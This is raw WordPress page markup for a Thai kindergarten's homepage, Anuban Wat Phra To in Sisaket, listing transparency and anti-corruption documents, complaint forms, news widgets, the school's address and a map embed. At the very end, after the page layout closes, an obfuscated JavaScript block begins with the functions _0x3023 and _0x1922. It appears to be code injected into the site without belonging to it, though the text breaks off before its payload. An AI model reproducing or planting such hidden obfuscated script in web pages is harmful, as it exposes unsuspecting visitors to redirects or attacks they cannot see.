data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 